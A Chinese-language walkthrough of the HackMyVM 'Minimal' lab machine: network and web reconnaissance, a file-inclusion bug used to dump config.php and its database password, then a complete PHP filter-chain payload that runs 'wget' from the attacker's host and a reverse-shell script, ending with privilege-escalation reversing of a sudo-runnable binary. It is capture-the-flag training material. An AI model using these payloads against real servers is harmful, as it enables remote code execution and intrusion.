HackMyVM-Minimal

news2024/11/24 13:02:17


目录

信息收集

arp

nmap

nikto

whatweb

WEB

web信息收集

gobuster

文件包含漏洞

提权

web信息收集

main方法

question_1

question_2

question_3

prize.txt

软连接


信息收集

arp
┌──(root?0x00)-[~/HackMyVM]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:9d:6d:7b, IPv4: 192.168.9.183
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)

192.168.9.205  08:00:27:5a:4c:d4  PCS Systemtechnik GmbH

13 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.259 seconds (113.32 hosts/sec). 13 responded


nmap
端口扫描

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -p- 192.168.9.205 --min-rate 10000 -oA ports  
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-11 08:12 CST
Nmap scan report for 192.168.9.205
Host is up (0.0017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:5A:4C:D4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 128.28 seconds

版本信息收集

┌──(root㉿0x00)-[~/HackMyVM]
└─# nmap -sC -sV -O -A -p 22,80 192.168.9.205 --min-rate 10000        
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-11 08:15 CST
Nmap scan report for 192.168.9.205
Host is up (0.0020s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 d2:73:06:e2:e4:84:54:8c:42:0f:4e:81:7c:78:b9:c2 (ECDSA)
|_  256 75:a0:cf:35:61:a1:c8:77:cf:1a:cb:bc:6d:5b:49:75 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Minimal Shop
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
MAC Address: 08:00:27:5A:4C:D4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.04 ms 192.168.9.205

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.68 seconds


nikto
┌──(root㉿0x00)-[~/HackMyVM]
└─# nikto -h 192.168.9.205                 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.9.205
+ Target Hostname:    192.168.9.205
+ Target Port:        80
+ Start Time:         2024-05-11 08:13:06 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /imgs/: Directory indexing found.
+ /imgs/: This might be interesting.
+ /styles/: Directory indexing found.
+ /login.php: Admin login page/section found.
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-05-11 08:15:31 (GMT8) (145 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


whatweb
┌──(root㉿0x00)-[~/HackMyVM]
└─# whatweb -v http://192.168.9.205                                   
WhatWeb report for http://192.168.9.205
Status    : 200 OK
Title     : Minimal Shop
IP        : 192.168.9.205
Country   : RESERVED, ZZ

Summary   : Apache[2.4.52], Cookies[PHPSESSID], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)]

Detected Plugins:
[ Apache ]
  The Apache HTTP Server Project is an effort to develop and 
  maintain an open-source HTTP server for modern operating 
  systems including UNIX and Windows NT. The goal of this 
  project is to provide a secure, efficient and extensible 
  server that provides HTTP services in sync with the current 
  HTTP standards. 

  Version      : 2.4.52 (from HTTP Server Header)
  Google Dorks: (3)
  Website     : http://httpd.apache.org/

[ Cookies ]
  Display the names of cookies in the HTTP headers. The 
  values are not returned to save on space. 

  String       : PHPSESSID

[ HTTPServer ]
  HTTP server header string. This plugin also attempts to 
  identify the operating system from the server header. 

  OS           : Ubuntu Linux
  String       : Apache/2.4.52 (Ubuntu) (from server string)

HTTP Headers:
  HTTP/1.1 200 OK
  Date: Sat, 11 May 2024 00:13:36 GMT
  Server: Apache/2.4.52 (Ubuntu)
  Set-Cookie: PHPSESSID=4glm3feckavkrh5qajsa0regno; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Content-Length: 1209
  Connection: close
  Content-Type: text/html; charset=UTF-8


WEB

web信息收集

主页是一个购物网站!

从源码中可以看到有一个登录后台的!


我们随便注册一个用户,登陆即可!

可以加入购物车!加入几个!

点击 Buy items 尝试购买!

乱填的,点击 End purchase时发现只是把购物车清空而已!

我们先尝试目录扫描吧!

gobuster
┌──(root?0x00)-[~/HackMyVM]
└─# gobuster dir -u http://192.168.9.205 -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.9.205
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6297]
/login.php            (Status: 200) [Size: 1019]
/register.php         (Status: 200) [Size: 1097]
/admin.php            (Status: 302) [Size: 0] [--> login.php]
/buy.php              (Status: 200) [Size: 892]
/imgs                 (Status: 301) [Size: 313] [--> http://192.168.9.205/imgs/]
/logout.php           (Status: 302) [Size: 0] [--> /index.php]
/config.php           (Status: 200) [Size: 0]
/styles               (Status: 301) [Size: 315] [--> http://192.168.9.205/styles/]
/robots.txt           (Status: 200) [Size: 12]
/restricted.php       (Status: 302) [Size: 0] [--> ../index.php]


扫描出来的信息都是没啥用的信息!
没办法,重新找思路!

大概找了几分钟,我发现了漏洞!

一开始没注意到了!

文件包含漏洞

注意看此处的url!

可以确定了!文件包含漏洞!目录扫描中扫到了config.php,但是利用文件包含的时候加上php会报错,不加反而可以出来!
base64解码后的 config.php内容

<?php
$servername = "localhost";
$username = "shop_admin";
$password = "Hey-Pls-Dont-Crack-This-Passwd";
$dbname = "shop";

$conn = new mysqli($servername, $username, $password, $dbname);

// Verificar la conexión
if ($conn->connect_error) {
    die("Error" . $conn->connect_error);
}

// Configurar el juego de caracteres
$conn->set_charset("utf8");
?>

可以看到用户名和密码

$username = "shop_admin";
$password = "Hey-Pls-Dont-Crack-This-Passwd";

不过没啥用,ssh登录不上,网站后台也登陆不上!尝试读取别的文件!

# index.php

<?php

require_once "./config.php";

session_start();

// Get products
$query = $conn->prepare("SELECT * FROM products");
$query->execute();
$products = $query->get_result();

$logged = false;

if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
    $logged = true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if(isset($_POST["product_id"])){
        $_SESSION['cart'][] = $_POST["product_id"];
    }
}
?>


<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./styles/main.css">
    <title>Minimal Shop</title>
</head>

<body>
    <header>
        <div class="logo">
            <a href="./index.php">
                <h1>Minimal</h1>
            </a>
        </div>
        </div>
        <div class="boton-iniciar-sesion">
            <?php
            if ($logged) {
                echo '<a href="shop_cart.php">My cart</a>';
                echo '<a href="logout.php">Sign out</a>';
            } else {
                echo '<a href="login.php">Log In</a>';
            }
            ?>
        </div>
    </header>

    <main>
        <?php
        while ($fila = mysqli_fetch_assoc($products)) {
            $id = $fila['id'];
            $name = $fila['name'];
            $price = $fila['price'];
            $description = $fila['description'];
            $author = $fila['author'];

            echo '<form action="index.php" method="post">
                <div class="contenedor-producto">
                    <div class="imagen-producto">
                        <img src="./imgs/' . $name . '.png" alt="Producto '.$id.'">
                    </div>
                    <div class="informacion-producto">
                        <h2>' . $name . '</h2>
                        <div class="descripcion">
                            <p>Designer: ' . $author . '</p>
                            <p>' . $description . '</p>
                            <p>Price: $' . $price . '</p>
                        </div>';
            if ($logged) {
                if (in_array($id, $_SESSION['cart'])) {
                echo '<p class="buy logtobuy">Added to cart</p>';
                }
                echo '<button class="buy button" type="submit" value="'. $id .'" name="product_id" >Buy</button>';
            } else {
                echo '<p class="buy logtobuy">Log In to buy</p>';
            }
            echo '
                    </div>
                </div>
                </form>
            ';
        };
        ?>
    </main>
</body>

</html>

# admin.php

<?php
require_once "./config.php";

session_start();

if ($_SESSION['username'] !== 'admin') {
    header('Location: login.php');
    exit;
}

$logged = false;

if (isset($_SESSION['loggedin']) && $_SESSION['loggedin'] === true) {
    $logged = true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $nombre = $_POST['nombre'];
    $autor = $_POST['autor'];
    $precio = $_POST['precio'];
    $descripcion = $_POST['descripcion'];

    if (isset($_FILES['imagen'])) {
        $imagen = $_FILES['imagen'];
        if ($imagen['error'] === UPLOAD_ERR_OK) {
            $ruta_destino = './imgs/' . basename($imagen['name']);

            if (move_uploaded_file($imagen['tmp_name'], $ruta_destino)) {
                $query = $conn->prepare("INSERT INTO products (name, author, price, description) VALUES (?, ?, ?, ?)");
                $query->bind_param("ssds", $nombre, $autor, $precio, $descripcion);
                // Ejecutar la consulta
                if ($query->execute()) {
                echo "Uploaded";
                } else {
                    echo "Error";
                }
            } else {
                //"Error al subir la imagen.";
                echo "Error";
            }
        } else {
            echo "Error: " . $imagen['error'];
        }
    }
}

?>
<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./styles/main.css">
    <link rel="stylesheet" href="./styles/admin.css">
    <title>Minimal Shop</title>
</head>

<body>
    <header>
        <div class="logo">
            <a href="./index.php">
                <h1>Minimal</h1>
            </a>
        </div>
        </div>
        <div class="boton-iniciar-sesion">
            <?php
            if ($logged) {
                echo '<a href="logout.php">Cerrar Sesión</a>';
                echo '<a href="shop_cart.php">Mi Carrito</a>';
            } else {
                echo '<a href="login.php">Iniciar Sesión</a>';
            }
            ?>
        </div>
    </header>
    <h1>Admin Panel</h1>
    <div class="container">
        <h1>Add new Product</h1>
        <form action="admin.php" method="post" enctype="multipart/form-data">
            <label for="nombre">Name:</label>
            <input type="text" name="nombre" id="nombre" required>

            <label for="autor">Author:</label>
            <input type="text" name="autor" id="autor" required>

            <label for="precio">Price:</label>
            <input type="number" name="precio" id="precio" required>

            <label for="descripcion">Description:</label>
            <textarea name="descripcion" id="descripcion" required></textarea>

            <label for="imagen">Img:</label>
            <input type="file" name="imagen" id="imagen" accept="image/*" required>

            <input type="submit" value="Upload">
        </form>
    </div>

</body>

</html>

 我参考了群主师傅的wp  https://www.bilibili.com/video/BV19m411d7kE/?vd_source=a883f5a7be6909eff14d565bc161efe8
 
 直接使用的脚本构造的payload!!


http://192.168.9.205/shop_cart.php?action=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=wget%20http://192.168.9.183:9898/cmd.php

http://192.168.9.205/shop_cart.php?action=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&cmd=php%20reverse.php

执行即可获取shell!


提权

web信息收集
从这开始,噩梦开始了!

获取交互式shell

export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'


www-data@minimal:/home/white$ sudo -l
sudo -l
Matching Defaults entries for www-data on minimal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User www-data may run the following commands on minimal:
    (root) NOPASSWD: /opt/quiz/shop
www-data@minimal:/home/white$ 

www-data@minimal:/opt/quiz$ ls
ls
prize.txt  results.txt  shop
www-data@minimal:/opt/quiz$ cat prize.txt     
cat  prize.txt
cat: prize.txt: Permission denied
www-data@minimal:/opt/quiz$ cat results.txt
cat results.txt
User: 0xH3rshel
Points: 3

prize.txt 文件不能看!

经过测试 shop 这个可执行程序存在溢出漏洞!

我们把shop文件下载本地进行逆向分析!

main方法

amd x86-64架构!

我们反编译一下!

推荐使用ida,cutter等等,我这里使用的r2用习惯了!

可以看到程序中存在 question_1、question_2、question_3等自定义函数!
[0x00401150]> afl
0x004010c0    1     11 sym.imp.puts
0x004010d0    1     11 sym.imp.fclose
0x004010e0    1     11 sym.imp.strlen
0x004010f0    1     11 sym.imp.system
0x00401100    1     11 sym.imp.printf
0x00401110    1     11 sym.imp.fgets
0x00401120    1     11 sym.imp.strcmp
0x00401130    1     11 sym.imp.fprintf
0x00401140    1     11 sym.imp.fopen
0x00401150    1     37 entry0
0x00401190    4     31 sym.deregister_tm_clones
0x004011c0    4     49 sym.register_tm_clones
0x00401200    3     32 sym.__do_global_dtors_aux
0x00401230    1      6 sym.frame_dummy
0x00401750    1     13 sym._fini
0x00401274   10    301 sym.secret_q2
0x0040147e    7    198 sym.question_2
0x00401180    1      5 sym._dl_relocate_static_pie
0x004015d5    1     10 sym.wait_what
0x0040168f    5    193 main
0x004015e2    4    173 sym.writeResults
0x004013a1    4    100 sym.secret_q3
0x00401405    4    121 sym.question_1
0x00401544    4    145 sym.question_3
0x00401236    3     62 sym.print_prize
0x00401000    3     27 sym._init
[0x00401150]> 

[0x00401150]> s main
[0x0040168f]> s
0x40168f

跳到main方法的主入口!
[0x0040168f]> pdf 
            ; DATA XREF from entry0 @ 0x401168(r)
┌ 193: int main (int argc, char **argv);
│           ; arg int argc @ rdi
│           ; arg char **argv @ rsi
│           ; var char *s @ rbp-0x8
│           ; var char *var_10h @ rbp-0x10
│           ; var uint32_t var_14h @ rbp-0x14
│           ; var int64_t var_18h @ rbp-0x18
│           ; var int64_t var_20h @ rbp-0x20
│           ; var int64_t var_24h @ rbp-0x24
│           ; var char **var_30h @ rbp-0x30
│           0x0040168f      f30f1efa       endbr64
│           0x00401693      55             push rbp
│           0x00401694      4889e5         mov rbp, rsp
│           0x00401697      4883ec30       sub rsp, 0x30
│           0x0040169b      897ddc         mov dword [var_24h], edi    ; argc
│           0x0040169e      488975d0       mov qword [var_30h], rsi    ; argv
│           0x004016a2      48b8726573..   movabs rax, 0x2e73746c75736572 ; 'results.'
│           0x004016ac      488945e0       mov qword [var_20h], rax
│           0x004016b0      c745e87478..   mov dword [var_18h], 0x747874 ; 'txt'
│           0x004016b7      488d05320a..   lea rax, str.Hey_guys__I_have_prepared_this_little_program_to_find_out_how_much_you_know_about_me__since_I_have_been_your_administrator_for_2_years. ; 0x4020f0 ; "Hey guys, I have prepared this little program to find out how much you know about me, since I have been your administrator for 2 years."                                                                                                                                                                  
│           0x004016be      488945f8       mov qword [s], rax
